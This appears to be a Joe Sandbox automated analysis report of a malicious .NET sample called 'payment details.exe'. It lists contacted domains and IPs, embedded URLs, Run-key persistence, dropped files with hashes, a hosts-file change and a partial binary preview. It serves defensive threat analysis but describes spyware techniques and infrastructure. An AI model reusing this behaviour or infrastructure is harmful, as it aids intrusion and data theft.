                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://almasroor.com0%Avira URL Cloudsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://mail.almasroor.com0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://uDoQcdZGpyqzP0ZwyV.com0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      almasroor.com
                      69.65.3.206
                      truetrueunknown
                      mail.almasroor.com
                      unknown
                      unknowntrue
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1payment details.exe, 00000005.00000002.920699036.00000000029B1000.00000004.00000001.sdmp, kprUEGC.exe, 00000012.00000002.818572720.00000000030F1000.00000004.00000001.sdmp, kprUEGC.exe, 00000013.00000002.919584190.00000000031F1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://www.apache.org/licenses/LICENSE-2.0payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                          high
                          http://www.fontbureau.compayment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                            high
                            http://www.fontbureau.com/designersGpayment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                              high
                              http://DynDns.comDynDNSkprUEGC.exe, 00000013.00000002.919584190.00000000031F1000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designers/?payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                                high
                                http://www.founder.com.cn/cn/bThepayment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%hapayment details.exe, 00000005.00000002.920699036.00000000029B1000.00000004.00000001.sdmp, kprUEGC.exe, 00000012.00000002.818572720.00000000030F1000.00000004.00000001.sdmp, kprUEGC.exe, 00000013.00000002.919584190.00000000031F1000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://github.com/michel-pi/EasyBot.NetkprUEGC.exe, payment details.exefalse
                                  high
                                  http://www.fontbureau.com/designers?payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.tiro.comkprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://bQxorv.comkprUEGC.exe, 00000013.00000002.919584190.00000000031F1000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.fontbureau.com/designerskprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.goodfont.co.krpayment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      https://api.ipify.org%$payment details.exe, 00000005.00000002.920699036.00000000029B1000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      http://www.carterandcone.comlpayment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.sajatypeworks.compayment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://almasroor.compayment details.exe, 00000005.00000002.923488347.0000000002D15000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.typography.netDpayment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers/cabarga.htmlNpayment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.founder.com.cn/cn/cThepayment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.galapagosdesign.com/staff/dennis.htmpayment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://fontfabrik.compayment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.founder.com.cn/cnpayment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers/frere-user.htmlpayment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.jiyu-kobo.co.jp/payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.galapagosdesign.com/DPleasepayment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers8payment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                                            high
                                            https://api.ipify.org%GETMozilla/5.0kprUEGC.exe, 00000013.00000002.919584190.00000000031F1000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            low
                                            http://www.fonts.compayment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.sandoll.co.krpayment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.urwpp.deDPleasepayment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.zhongyicts.com.cnpayment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.sakkal.compayment details.exe, 00000000.00000002.694767298.0000000005BE0000.00000002.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.802621284.0000000005820000.00000002.00000001.sdmp, kprUEGC.exe, 00000010.00000002.823184055.0000000005B40000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://mail.almasroor.compayment details.exe, 00000005.00000002.923488347.0000000002D15000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zippayment details.exe, 00000000.00000002.690986558.0000000003C59000.00000004.00000001.sdmp, payment details.exe, 00000005.00000002.916754002.0000000000402000.00000040.00000001.sdmp, kprUEGC.exe, 0000000F.00000002.795750062.00000000037E9000.00000004.00000001.sdmp, kprUEGC.exe, 00000010.00000002.816268269.0000000003C09000.00000004.00000001.sdmp, kprUEGC.exe, 00000012.00000002.817039638.0000000000402000.00000040.00000001.sdmp, kprUEGC.exe, 00000013.00000002.916752082.0000000000402000.00000040.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://uDoQcdZGpyqzP0ZwyV.compayment details.exe, 00000005.00000002.923358633.0000000002CD9000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              69.65.3.206
                                              almasroor.comUnited States
                                              32181ASN-GIGENETUStrue

                                              General Information

                                              Joe Sandbox Version:31.0.0 Emerald
                                              Analysis ID:383908
                                              Start date:08.04.2021
                                              Start time:12:11:20
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 12m 49s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:payment details.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:23
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.adwa.spyw.evad.winEXE@9/6@2/1
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 0% (good quality ratio 0%)
                                              • Quality average: 51%
                                              • Quality standard deviation: 0%
                                              HCA Information:
                                              • Successful, ratio: 99%
                                              • Number of executed functions: 261
                                              • Number of non-executed functions: 15
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                              • Excluded IPs from analysis (whitelisted): 168.61.161.212, 23.54.113.53, 52.147.198.201, 104.43.139.144, 13.88.21.125, 13.64.90.137, 20.82.210.154, 23.10.249.26, 23.10.249.43, 23.0.174.185, 23.0.174.200, 52.155.217.156, 20.54.26.129, 20.82.209.183
                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              12:12:20API Interceptor630x Sleep call for process: payment details.exe modified
                                              12:12:55AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run kprUEGC C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                              12:13:03AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run kprUEGC C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                              12:13:10API Interceptor289x Sleep call for process: kprUEGC.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              No context

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              ASN-GIGENETUSAWB-9899691012.exeGet hashmaliciousBrowse
                                              • 45.85.90.220
                                              swift_76567643.exeGet hashmaliciousBrowse
                                              • 70.32.1.32
                                              BillOfLading.exeGet hashmaliciousBrowse
                                              • 45.85.90.220
                                              OPEN01929291000_2021-03-15_07-28.exeGet hashmaliciousBrowse
                                              • 45.85.90.188
                                              INV242-0303.docGet hashmaliciousBrowse
                                              • 45.85.90.197
                                              dwg.exeGet hashmaliciousBrowse
                                              • 45.85.90.226
                                              a55ddff55740467df8dee39a5bbaee32.exeGet hashmaliciousBrowse
                                              • 45.85.90.138
                                              116e4c42d3948c91eafdcb60a9f37014.exeGet hashmaliciousBrowse
                                              • 45.85.90.138
                                              771eb3ef5ede516d6ec53ae40b3f888f.exeGet hashmaliciousBrowse
                                              • 45.85.90.138
                                              Paid Invoice _confirmation_9336639_03993736553.exeGet hashmaliciousBrowse
                                              • 216.38.7.225
                                              YCVj3q7r5e.exeGet hashmaliciousBrowse
                                              • 70.32.1.32
                                              VOR001 - McMurray Statements December 2020_87373535737522772662626.exeGet hashmaliciousBrowse
                                              • 216.38.7.225
                                              Customer_Receivables_Aging_20210112_2663535345242424242.exeGet hashmaliciousBrowse
                                              • 216.38.7.225
                                              Proforma fatura.exeGet hashmaliciousBrowse
                                              • 216.38.2.215
                                              Invoice.exeGet hashmaliciousBrowse
                                              • 216.38.2.215
                                              Purchase Order-34002174,pdf.exeGet hashmaliciousBrowse
                                              • 216.38.7.231
                                              IT3(b) certificate_846392852289725282735792726639.exeGet hashmaliciousBrowse
                                              • 216.38.7.225
                                              Customer Remittance Advice 9876627262822662.exeGet hashmaliciousBrowse
                                              • 216.38.7.225
                                              newbinx.exeGet hashmaliciousBrowse
                                              • 216.38.2.206
                                              Purchase New Order_101520,pdf.exeGet hashmaliciousBrowse
                                              • 216.38.7.231

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kprUEGC.exe.log
                                              Process:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.355304211458859
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                              MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                              SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                              SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                              SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\payment details.exe.log
                                              Process:C:\Users\user\Desktop\payment details.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.355304211458859
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                              MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                              SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                              SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                              SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                              C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                              Process:C:\Users\user\Desktop\payment details.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):729600
                                              Entropy (8bit):7.8860851483500385
                                              Encrypted:false
                                              SSDEEP:12288:wfBr6Pu2iNXNKJSjlVQp9Tjj7pqA8C8veXh+R7QrRLqQsm2T8TJjHEM0Eyxf3:+ruu1lNhK9Tn7YESQK0rR6f8TJuV3
                                              MD5:55191839573AC8FD25655B3561286BC1
                                              SHA1:B9E85E2AB05E4B027A3F522FD690B097AA4A4AAD
                                              SHA-256:E81D917830F3FABCA0557B899267EBE84ECC6FCBB5E1CD649284D1370D8A8876
                                              SHA-512:3488AB665AEDFEC80B744E403C8A0772097608C679E62B4CCE77103B2B3EFDAD262E41CDA0F579533C4D8C061AACF9963A61AB90053FBDF58F70F67685A69C84
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 33%
                                              Reputation:low
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...WZn`..............0..............6... ...@....@.. ....................................@..................................5..O....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................5......H...........h...........lZ..X...........................................^..}.....(.......(.....*..*..0..+.........,..{.......+....,...{....o........(.....*..0................(....s......s....}.....s....}.....s....}.....s....}.....s....}.....s ...}.....s!...}.....s"...}.....{....o#.....{....o$.....(#.....{.....o%.....{....o&...."...Bs'...o(...&.{....o&...."...Bs'...o(...&.{....o)....{......o*.....{....o)....{......o*.....{....o)....{......o*.....{....o)....{......o*.....{....o
                                              C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe:Zone.Identifier
                                              Process:C:\Users\user\Desktop\payment details.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview: [ZoneTransfer]....ZoneId=0
                                              C:\Windows\System32\drivers\etc\hosts
                                              Process:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):11
                                              Entropy (8bit):2.663532754804255
                                              Encrypted:false
                                              SSDEEP:3:iLE:iLE
                                              MD5:B24D295C1F84ECBFB566103374FB91C5
                                              SHA1:6A750D3F8B45C240637332071D34B403FA1FF55A
                                              SHA-256:4DC7B65075FBC5B5421551F0CB814CAFDC8CACA5957D393C222EE388B6F405F4
                                              SHA-512:9BE279BFA70A859608B50EF5D30BF2345F334E5F433C410EA6A188DCAB395BFF50C95B165177E59A29261464871C11F903A9ECE55B2D900FE49A9F3C49EB88FA
                                              Malicious:true
                                              Reputation:moderate, very likely benign file
                                              Preview: ..127.0.0.1

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.8860851483500385
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
